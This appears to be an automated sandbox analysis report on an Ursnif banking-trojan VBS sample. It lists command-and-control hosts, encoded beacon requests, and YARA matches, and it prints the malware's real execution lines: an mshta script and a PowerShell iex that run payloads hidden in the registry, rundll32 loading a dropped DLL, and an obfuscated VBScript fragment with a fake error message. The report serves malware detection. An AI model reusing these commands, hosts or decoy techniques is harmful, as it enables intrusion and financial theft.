                      Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownHTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                      Source: unknownDNS traffic detected: queries for: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary:

                      barindex
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01201754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01207E30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_0120725F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CE95C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DB948
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DB230
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D5164
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C1164
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C4150
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B0000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B2138
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C0124
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CA9F8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C7820
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B1000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B90FC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C70C8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D88B8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CF7B4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7E4796
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CA790
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B3610
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D2EF8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B76F4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D5ED8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CC6C4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C2EC0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D06B4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D6EA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C6684
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C9500
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C1DF4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D4DE0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C5DBC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C559C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D9408
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D3400
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B74A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C4484
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B4B60
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D4354
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B1348
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C8340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CD328
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D730C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7BABDC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DA3A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D4BA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CBA74
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B9AD8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_012040DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01208055 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CE95C NtSetContextThread,NtUnmapViewOfSection,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C1950 NtWriteVirtualMemory,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CE860 NtQueryInformationProcess,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D20A4 NtQueryInformationToken,NtQueryInformationToken,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C8B90 NtMapViewOfSection,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C5B80 NtCreateSection,
                      Source: 1cv1ijms.dll.41.drStatic PE information: No import functions for PE file found
                      Source: start[526268].vbsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210910Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winVBS@17/16@6/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01202102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{9E926C87-6559-80BB-DFB2-69B48306AD28}
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: start[526268].vbsStatic file information: File size 1402115 > 1048576
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      VBScript performs obfuscated calls to suspicious functionsShow sources
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 